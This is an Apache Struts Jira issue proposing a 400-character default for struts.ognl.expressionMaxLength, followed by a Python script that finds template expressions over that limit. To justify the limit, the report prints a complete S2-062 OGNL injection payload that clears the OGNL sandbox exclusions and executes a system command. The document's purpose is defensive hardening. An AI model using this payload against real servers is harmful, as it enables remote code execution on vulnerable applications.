tanli created WW-5179:
-------------------------

             Summary: struts.ognl.expressionMaxLength default set 400
                 Key: WW-5179
                 URL: https://issues.apache.org/jira/browse/WW-5179
             Project: Struts 2
          Issue Type: Improvement
          Components: Core
    Affects Versions: 2.6
            Reporter: tanli


struts.ognl.expressionMaxLength

default set 400

I reduced the st062 exp:

%\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}

 

Its length is 709, so setting the default OGNL expression length to 400 could keep our app safe.




--
This message was sent by Atlassian Jira
(v8.20.7#820007)
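
Before enforcing the cap proposed above, a deployment can check that none of its own templates carries a legitimate expression longer than the limit. The following Python is an added example, not part of the report or of Struts; the function names, the sample templates, and the assumption that the cap is compared against the text inside `%{...}` / `${...}` are all illustrative.

```python
LIMIT = 400  # value proposed in this issue for struts.ognl.expressionMaxLength

def find_expressions(text):
    """Yield (offset, expression) for each brace-balanced %{...} or ${...}."""
    i = 0
    while i < len(text) - 1:
        if text[i] in "%$" and text[i + 1] == "{":
            depth, j, quote = 0, i + 1, None
            while j < len(text):
                ch = text[j]
                if quote:                      # inside an OGNL string literal
                    if ch == "\\":
                        j += 1                 # skip the escaped character
                    elif ch == quote:
                        quote = None
                elif ch in "'\"":
                    quote = ch
                elif ch == "{":
                    depth += 1
                elif ch == "}":
                    depth -= 1
                    if depth == 0:
                        break
                j += 1
            if j < len(text) and depth == 0:   # ignore unterminated expressions
                yield i, text[i:j + 1]
                i = j + 1
                continue
        i += 1

def over_limit(templates, limit=LIMIT):
    """Return [(name, offset, length)] for expression bodies longer than limit."""
    hits = []
    for name, text in templates.items():
        for off, expr in find_expressions(text):
            body = expr[2:-1]  # assumption: cap applies to text inside the delimiters
            if len(body) > limit:
                hits.append((name, off, len(body)))
    return hits

# Constructed sample templates (not taken from any real application).
SAMPLES = {
    "list.jsp": '<s:property value="%{user.name}"/> <s:if test="%{items.{? #this.active}.size > 0}">',
    "report.jsp": '<s:set var="x" value="%{' + " + ".join(f"row.col{n}" for n in range(60)) + '}"/>',
}

if __name__ == "__main__":
    for name, off, length in over_limit(SAMPLES):
        print(f"{name}@{off}: expression body is {length} chars, over {LIMIT}")
```

Any hit is an expression that would stop evaluating once the cap is enforced, so it needs refactoring (or the limit needs raising) before rollout.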
